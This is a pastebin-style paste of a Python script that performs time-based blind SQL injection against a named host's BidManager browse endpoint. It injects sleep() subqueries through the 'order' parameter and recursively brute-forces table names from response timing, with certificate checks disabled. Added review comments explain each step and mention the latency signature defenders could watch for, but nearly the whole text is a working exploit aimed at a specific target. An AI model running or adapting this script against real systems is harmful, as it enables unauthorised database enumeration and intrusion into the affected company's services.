0xPrototype

sql

Aug 6th, 2022
  1. #/usr/bin/python3
  2.  
  3. import requests
  4. import string
  5. import urllib3
  6.  
# Disable ssl warnings because of the VPN connection
# NOTE(review): the requests below pass verify=False, i.e. the server
# certificate is never checked; silencing this warning also hides that from
# anyone reading the console output.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Requests stuff
# Host every probe is sent to, and the single header attached to each request
# (a desktop-browser User-Agent string).
BASE_URL = "https://my.hughesnet.com.uat2.net"
USER_AGENT = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"
}
# SQLi sleep time
# Seconds the injected sleep() is asked to run; do_like_query / do_exact_query
# treat a response slower than this (or a read timeout) as a "true" answer.
# From a defender's side, a burst of requests to one endpoint whose latency
# clusters around this value is the observable signature of this technique.
SLEEP_TIME = 10

# Build the character pool
# Alphabet tried at every position by main(): letters, digits and a handful of
# punctuation / whitespace characters.  It is sorted, presumably so the
# character-by-character comparison in do_like_query's cache check is
# meaningful -- confirm against that function.
CHARACTER_POOL = []
CHARACTER_POOL.extend(string.ascii_letters)
CHARACTER_POOL.extend(string.digits)
CHARACTER_POOL.extend([".", "_", "-", " ", "~", "|", "/", "(", ")", "=", "@", "\t", "\n"])
CHARACTER_POOL.sort()

# Define cache, really only needed to speed up testing
# Names already known from earlier runs; nothing in this file appends to it,
# so it is filled by hand.  The sort() on the empty list is a no-op.
CACHE = []
CACHE.sort()

# Result array
# Names confirmed by do_exact_query; appended in main(), printed at exit.
VALID_WORDS = []
  31.  
  32.  
# Current queries enumerate all tables in the database
def do_like_query(prefix: str) -> bool:
    """Return True when the timing oracle says a table name starts with *prefix*.

    The injected subselect calls ``sleep(SLEEP_TIME)`` guarded by a
    ``LIKE BINARY '<prefix>%'`` condition, so the only signal is elapsed time:
    a response slower than SLEEP_TIME, or a read timeout, is reported as True.
    Every probe is printed to stdout.
    """
    # Check cache
    print(f"Testing characters with LIKE query: {prefix}")
    # While nothing has been confirmed yet and a cache exists, compare the last
    # cached name with the candidate prefix position by position; the first
    # cached character that sorts AFTER the candidate one short-circuits to
    # False.  Any other outcome falls through to a real request.
    if len(VALID_WORDS) == 0 and len(CACHE) > 0:
        last_word = CACHE[-1]
        for known_letter, new_letter in zip(last_word, prefix):
            if known_letter > new_letter:
                print(f"like cache hit for {known_letter=} with {new_letter=} in {prefix=}")
                return False
    # Do real request
    # Prefix '_' with a backslash (presumably so LIKE treats it literally).
    # "\_" is not a recognised Python escape, so the literal keeps both chars.
    prefix = prefix.replace("_", "\_")
    like_payload = f",(select * from (select sleep({SLEEP_TIME}) from dual where table_schema = 'BidManager' and table_name like binary '{prefix}%%')a)-- "
    # The payload rides in the `order` query parameter of browse.pyt.
    path = f"/bidmanager/company/browse.pyt?query=test&order=ASC{like_payload}&fromPagination=1&orderBy=quantityRequired"
    url = BASE_URL + path

    try:
        # verify=False: no certificate validation (see module-level warning
        # suppression).  The timeout is one second past the sleep, so a
        # matching row usually returns normally rather than timing out.
        res = requests.get(url, headers=USER_AGENT, timeout=SLEEP_TIME + 1, verify=False)
        time_taken = res.elapsed.total_seconds()
        return time_taken > SLEEP_TIME
    except requests.exceptions.ReadTimeout:
        # A timeout is counted as a match, not as an error.
        return True
  55.  
  56.  
# Validate the found word to eliminate false positives
def do_exact_query(search: str) -> bool:
    """Return True when the timing oracle confirms *search* as a full table name.

    Same time-based mechanism as do_like_query, but the condition is an exact
    ``binary table_name = '<search>'`` match against information_schema.tables,
    used by main() to re-check a prefix before recording it.
    """
    # Check cache
    print(f"Validating result with exact query: {search}")
    # A name already in CACHE is accepted without a request.
    if search in CACHE:
        print("exact cache hit")
        return True
    # Do real request
    # Backslash-prefix '_' as in do_like_query; the `in` test only avoids a
    # replace() call on strings that contain no underscore.
    if "_" in search:
        search = search.replace("_", "\_")
    exact_payload = f",(select * from (select sleep({SLEEP_TIME}) from information_schema.tables where table_schema = 'BidManager' and binary table_name = '{search}')a)-- "
    path = f"/bidmanager/company/browse.pyt?query=test&order=ASC{exact_payload}&fromPagination=1&orderBy=quantityRequired"
    url = BASE_URL + path

    try:
        # Identical request/timing logic to do_like_query: certificate checks
        # disabled, latency above SLEEP_TIME means "true".
        res = requests.get(url, headers=USER_AGENT, timeout=SLEEP_TIME + 1, verify=False)
        time_taken = res.elapsed.total_seconds()
        return time_taken > SLEEP_TIME
    except requests.exceptions.ReadTimeout:
        # A timeout is counted as a match.
        return True
  77.  
  78.  
# Actually do some programming
def main(prefix: str = ""):
    """Extend *prefix* depth-first, one character from CHARACTER_POOL at a time.

    For every character, a LIKE probe on ``prefix + char`` decides whether to
    recurse with the longer prefix.  Only when the LAST character of the pool
    also misses is *prefix* itself checked with an exact probe; a confirmed
    name is appended to the module-level VALID_WORDS list.
    """
    for idx, char in enumerate(CHARACTER_POOL):
        results = do_like_query(prefix + char)
        if results:
            print("[+] Got a hit, entering next recursion depth")
            main(prefix + char)
        else:
            # Reaching the end of the pool without a hit means no longer name
            # starts with this prefix, so test whether the prefix is complete.
            if idx == (len(CHARACTER_POOL) - 1) and do_exact_query(prefix):
                print("[+] Validation successful!")
                VALID_WORDS.append(prefix)
                print(f"Word found: {prefix}")
  91.  
  92.  
if __name__ == '__main__':
    # Start from the empty prefix; confirmed names accumulate in VALID_WORDS.
    main()
    print(f"Results: {VALID_WORDS}")
  96.  